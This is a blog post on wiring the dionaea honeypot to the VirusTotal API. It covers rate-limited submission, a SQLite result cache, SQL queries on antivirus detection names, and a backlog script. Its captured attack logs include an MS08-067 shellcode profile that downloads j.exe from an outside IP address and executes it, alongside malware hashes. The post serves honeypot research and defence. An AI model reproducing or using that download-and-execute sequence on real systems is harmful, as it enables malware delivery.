I was messing with virustotal some time ago, and back then you had to scrape the HTML output. Things have changed: virustotal now offers a free HTTP API to interface with their services. All you have to do is sign up and get the API key, which is hidden deep in the web2.0 interface.
The API offers three calls: get_file_report, scan_file and make_comment.
When we receive a new file, we first have to check whether virustotal already knows it, which is done by calling get_file_report. The JSON-encoded result set indicates whether the file is known; for known files, we are done at this point.
If the file is unknown, we submit it using scan_file. Once the file is uploaded, we wait 60 seconds and post a rather useless but self-advertising comment: this file was gathered by the dionaea honeypot.
Then we have to wait for virustotal to analyze the file, polling for the result with get_file_report.
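To make the order of calls concrete, here is a minimal sketch of that workflow in Python. It is not dionaea's actual code: the api object, its method signatures, the None return for "unknown or not analyzed yet", and the poll_interval and max_polls parameters are all assumptions made for illustration. Only the three call names and the 60 second wait come from the description above.

```python
import time


def process_file(api, md5_hash, path, sleep=time.sleep,
                 poll_interval=20, max_polls=30):
    """Walk one file through the lookup / submit / comment / poll steps.

    `api` is a hypothetical object offering get_file_report, scan_file and
    make_comment. get_file_report is assumed to return a report, or None
    while the file is unknown or still being analyzed.
    """
    report = api.get_file_report(md5_hash)
    if report is not None:
        return report  # file was already known, nothing else to do

    api.scan_file(path)
    sleep(60)  # wait a minute after the upload before commenting
    api.make_comment(md5_hash,
                     "This file was gathered by the dionaea honeypot.")

    # Poll until the analysis shows up or we give up.
    for _ in range(max_polls):
        sleep(poll_interval)
        report = api.get_file_report(md5_hash)
        if report is not None:
            return report
    return None  # analysis did not finish within max_polls attempts
```

Passing sleep in as a parameter keeps the sketch testable without actually waiting.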
While the API imposes a limit of at most 20 calls in 5 minutes, the initial version of the code dionaea used to submit files to virustotal simply ignored this limit, and it also ignored the result returned by virustotal.
As the information returned by virustotal is rather interesting, I decided to let dionaea store it and associate it with the other data gathered for the attacks: the data returned by virustotal is now stored in the sqlite database.
And since I wanted virustotal to process the whole backlog of files dionaea had gathered so far, dionaea had to honor the 20/5 API call limit virustotal imposes.
So dionaea's virustotal code maintains a cache of outstanding virustotal operations for all files lacking virustotal information. This cache is a sqlite3 database, and we process one item from it every 20 seconds.
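The arithmetic behind the 20 second interval: 20 calls in 5 minutes allows one call every 15 seconds, so one call every 20 seconds stays below the limit with some margin. The following is only a sketch of such a throttle, not dionaea's implementation; the Throttle class and its parameters are made up for illustration.

```python
import time

API_CALLS = 20              # calls allowed per window (the limit quoted above)
WINDOW_SECONDS = 5 * 60     # length of the window in seconds
MIN_INTERVAL = WINDOW_SECONDS / API_CALLS   # 15.0 seconds between calls
DIONAEA_INTERVAL = 20       # the interval mentioned in the text


class Throttle:
    """Hypothetical helper: space calls at least `interval` seconds apart."""

    def __init__(self, interval, clock=time.monotonic, sleep=time.sleep):
        self.interval = interval
        self.clock = clock
        self.sleep = sleep
        self.next_allowed = clock()  # the first call may run immediately

    def wait(self):
        # Sleep until the next slot is free, then reserve the following one.
        delay = self.next_allowed - self.clock()
        if delay > 0:
            self.sleep(delay)
        self.next_allowed = max(self.clock(), self.next_allowed) + self.interval
```

Calling wait() before every API request is enough; at 20 seconds per request that is 15 requests per 5 minutes.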
logsql stores the final information in the logsql.sqlite database and you can use readlogsqltree to get a readable representation of the information received.
2010-10-07 02:50:23
connection 483162 smbd tcp accept 93.218.68.29:445 <- 194.170.206.5:16240 (483162 None)
dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 6cb71c2c-9812-4540-0100-000000000000
dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 24 (CreateServiceA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
profile: []
offer: smb://194.170.206.5/csrss.exe
download: 12fb7332920a7797c2d02df29b57c640 smb://194.170.206.5
virustotal 2010-08-30 14:06:38 39/43 (91%) http://www.virustotal.com/file-scan/report.html?id=c7247d162cf720c07979946afd01b6b1907db9a4be6916a3a6be268993638fee-1283169998
names 'Downloader' 'Downloader.Generic' 'Email-Worm.Win32.Atak' 'Email-Worm.Win32.Atak!IK' 'Generic Worm' 'Heuristic.BehavesLike.Win32.Proxy.H' 'Medium Risk Malware' 'PSW.Agent.AHCN' 'TR/Agent.mtv' 'Troj/Brambul-A' 'TrojWare.Win32.Agent.mtv0' 'Trojan' 'Trojan-Spy.Win32.Agent.bazy' 'Trojan-Spy.Win32.Agent.bbel' 'Trojan-Spy/W32.Agent.57344.KT' 'Trojan.Win32.Generic!BT' 'Trojan.Win32.Generic.51EEB62C' 'Trojan/Spy.Agent.bbel' 'Trojan/Win32.Agent.gen' 'Trojan:Win32/Brambul.A' 'TrojanSpy.Agent.QBIR' 'TrojanSpy.Agent.bbel' 'TrojanSpy.Agent.mza' 'W32/Bagz.gen@MM' 'W32/EMailWorm.DUT' 'W32/Trojan2.KEXN' 'WORM_MYDOOM.DA' 'Win-Trojan/Agent.57344.XY' 'Win32.HLLW.Bumble' 'Win32.TRAgent.Mtv' 'Win32/Pepex.E' 'Win32/Tnega.WW' 'Win32:Rootkit-gen' 'Worm.Generic.241160'
You get the detection rate, the link for the virustotal report and the names the different av companies assigned to the threat.
As CME was abandoned, the only way to get a reasonable number of names is gathering files with low detection rates:
2010-10-06 19:16:07
connection 482728 smbd tcp accept 93.218.68.209:445 <- 93.81.169.153:3132 (482728 None)
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.171/j.exe', '83.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['83.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
offer: http://208.53.183.171/j.exe
download: c9e5edea5f4f1b2c7ea6a3d15a9450f7 http://208.53.183.171/j.exe
virustotal 2010-10-05 20:49:20 0/43 (0%) http://www.virustotal.com/file-scan/report.html?id=3819100edd956200aa65ce6dceb3fd07414f180e624fdb1979bb13c8b3019d0c-1286304560
names
In this case there was no detection, but if you follow the link, virustotal points to a more recent analysis of the file, in which 14 of 42 scanners detected the threat.
Given the data is available in a sqlite database, it is rather easy to query …
SELECT
    COUNT(virustotalscan_result), virustotalscan_result
FROM
    virustotals
    NATURAL JOIN virustotalscans
WHERE
    virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY
    virustotalscan_result
ORDER BY
    COUNT(virustotalscan_result) DESC;
Get all names for Conficker - if one scanner claims it is Conficker, we assume all other names are aliases for Conficker.
| count | name |
| 8900 | Win32.Worm.Downadup.Gen |
| 6894 | W32/Conficker!Generic |
| 5797 | WORM_DOWNAD.AD |
| 3870 | Net-Worm.Win32.Kido.ih |
| 3721 | Mal/Conficker-A |
| 3666 | W32/Conficker.worm.gen.a |
| 3605 | W32/Conficker.C.worm |
| 3423 | W32.Downadup.B |
| 3388 | Win32:Confi |
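If you would rather run this kind of alias query from Python, something like the following should work. This is a sketch under assumptions: the two-table schema is reduced to the columns the query needs (guessed from the column names used in this post, not copied from dionaea), the rows are toy data, and it joins virustotals with virustotalscans.

```python
import sqlite3

ALIAS_QUERY = """
SELECT COUNT(virustotalscan_result), virustotalscan_result
FROM virustotals NATURAL JOIN virustotalscans
WHERE virustotal IN (
    SELECT DISTINCT virustotal FROM virustotalscans
    WHERE virustotalscan_result LIKE ?)
GROUP BY virustotalscan_result
ORDER BY COUNT(virustotalscan_result) DESC;
"""


def aliases(conn, pattern):
    """Return (count, name) rows for all samples where any scanner matches."""
    return conn.execute(ALIAS_QUERY, (pattern,)).fetchall()


def make_toy_db():
    """In-memory stand-in for logsql.sqlite; schema and rows are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE virustotals (
            virustotal INTEGER PRIMARY KEY,
            virustotal_md5_hash TEXT);
        CREATE TABLE virustotalscans (
            virustotalscan INTEGER PRIMARY KEY,
            virustotal INTEGER,
            virustotalscan_scanner TEXT,
            virustotalscan_result TEXT);
    """)
    conn.executemany("INSERT INTO virustotals VALUES (?, ?)",
                     [(1, "aa"), (2, "bb"), (3, "cc")])
    conn.executemany(
        "INSERT INTO virustotalscans "
        "(virustotal, virustotalscan_scanner, virustotalscan_result) "
        "VALUES (?, ?, ?)",
        [(1, "ScannerA", "W32/Conficker!Generic"),
         (1, "ScannerB", "Win32.Worm.Downadup.Gen"),
         (2, "ScannerA", "Trojan.Generic"),
         (3, "ScannerA", "Mal/Conficker-A"),
         (3, "ScannerB", "Win32.Worm.Downadup.Gen")])
    return conn


if __name__ == "__main__":
    for count, name in aliases(make_toy_db(), "%Conficker%"):
        print(count, name)
```

Against the real database you would pass sqlite3.connect('/opt/dionaea/var/dionaea/logsql.sqlite') instead of the toy connection.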
SELECT
    COUNT(DISTINCT virustotalscan_result), virustotalscan_scanner
FROM
    virustotals
    NATURAL JOIN virustotalscans
WHERE
    virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY
    virustotalscan_scanner
ORDER BY
    COUNT(DISTINCT virustotalscan_result) DESC;
Signature quality: how many distinct signatures each scanner has for Conficker.
| count | scanner |
| 1445 | nProtect |
| 592 | McAfee-GW-Edition |
| 558 | Jiangmin |
| 463 | McAfee |
| 456 | McAfee+Artemis |
| 330 | ViRobot |
| 270 | Rising |
| 260 | ClamAV |
SELECT
    download_md5_hash,
    COUNT(DISTINCT dcerpcserviceop_vuln) AS vulncnt,
    MAX(dcerpcserviceop_vuln) AS maxvuln,
    COUNT(download_md5_hash) AS numdls
FROM
    virustotalscans
    NATURAL JOIN virustotals
    JOIN downloads ON(download_md5_hash = virustotal_md5_hash)
    NATURAL JOIN connections
    NATURAL JOIN dcerpcrequests
    JOIN dcerpcservices ON(dcerpcrequest_uuid = dcerpcservice_uuid)
    JOIN dcerpcserviceops ON (dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum)
WHERE
    virustotalscan_scanner = 'Kaspersky'
    AND virustotalscan_result IS NULL
    AND dcerpcserviceop_vuln IS NOT NULL
    AND dcerpcserviceop_vuln != ''
GROUP BY
    download_md5_hash
ORDER BY
    COUNT(download_md5_hash) DESC;
Query all samples gathered via SMB bugs that Kaspersky does not detect, along with the vulnerability used.
| md5sum | number of vulns | example vuln | downloads |
| 3498bcd9d0f5f94575f7b4e78d1b337d | 1 | MS08-67 | 6 |
| 3ae47280a0008814efef0e9f236f1800 | 1 | MS08-67 | 4 |
| 7c5b64d771e0f205e3884c3fcf361a8b | 1 | MS08-67 | 4 |
| 3de40bad3d1409376ad77077159707bb | 1 | MS08-67 | 3 |
| 2b40f52664bda0565f6c2c6016c50cad | 1 | MS08-67 | 2 |
| 53979f1820886f089a75689ed15ecf6e | 1 | MS08-67 | 2 |
As this is quite new code, and dionaea only queries new files, by default you won't get any virustotal results for the files you gathered so far. This can be changed, though.
We can simply store all files you have received so far in the already mentioned virustotal cache file, and dionaea will process your whole backlog.
Due to the API limit of 20 requests in 5 minutes, with dionaea doing one request every 20 seconds, this will take some time.
#!/opt/dionaea/bin/python3
import sqlite3

# All downloads that have no virustotal entry yet, most frequent first.
lsqld = sqlite3.connect('/opt/dionaea/var/dionaea/logsql.sqlite')
lsqlc = lsqld.cursor()
r = lsqlc.execute("""SELECT
        download_md5_hash
    FROM
        downloads
        LEFT OUTER JOIN virustotals ON (virustotal_md5_hash = download_md5_hash)
    WHERE
        virustotal_md5_hash IS NULL
    GROUP BY
        download_md5_hash
    ORDER BY
        COUNT(*) DESC;""")

# Queue each of them in the virustotal cache as a 'new' backlog item.
vtd = sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite')
vtc = vtd.cursor()
for i in r:
    vtc.execute("INSERT INTO backlogfiles (status,md5_hash,path,timestamp) VALUES ('new',?,?,strftime('%s','now'))",
        (i[0], '/opt/dionaea/var/dionaea/binaries/' + i[0]))
vtd.commit()
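To get a feeling for "some time", here is a rough back-of-the-envelope estimate. The function name and the default of 4 requests per file are my assumptions (one lookup, one upload, one comment and at least one poll for a file virustotal does not know yet; a known file needs just the lookup), so treat the result as a rough guide rather than an exact figure.

```python
def backlog_eta_hours(n_files, requests_per_file=4, seconds_per_request=20):
    """Estimate hours needed to work through n_files backlog entries.

    requests_per_file is an assumption; files that need several polls
    before the analysis is ready will take longer.
    """
    return n_files * requests_per_file * seconds_per_request / 3600


if __name__ == "__main__":
    # 900 unknown files at 4 requests each, one request every 20 seconds
    print(backlog_eta_hours(900))
```

With these assumptions, a backlog of 900 unknown files takes about 20 hours.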
You can check the status from time to time:
sqlite3 /opt/dionaea/var/dionaea/vtcache.sqlite
SELECT count(*) FROM backlogfiles;
get number of pending files
SELECT * FROM backlogfiles WHERE STATUS != 'new';
get files which are in processing
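If you want all of this at a glance, grouping by status gives one count per state. A small sketch, assuming nothing about the backlogfiles table beyond the status column used above; the helper name is made up.

```python
import sqlite3


def backlog_summary(conn):
    """Return a {status: count} dict for the backlogfiles table."""
    rows = conn.execute(
        "SELECT status, COUNT(*) FROM backlogfiles "
        "GROUP BY status ORDER BY status")
    return dict(rows.fetchall())


if __name__ == "__main__":
    conn = sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite')
    for status, count in backlog_summary(conn).items():
        print(status, count)
```

Unusual status values stand out immediately in this view.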
As dionaea currently does not deal gracefully with virustotal server or connection errors, files sometimes get stuck. You can revive them using:
UPDATE backlogfiles SET STATUS = 'comment' WHERE STATUS = 'comment-';
UPDATE backlogfiles SET STATUS = 'new' WHERE STATUS = 'new-';
UPDATE backlogfiles SET STATUS = 'query' WHERE STATUS = 'query-';
And for some files, virustotal does not work at all: in my case I was unable to submit some files, d320d802a407da14a77e809329de31cc for example.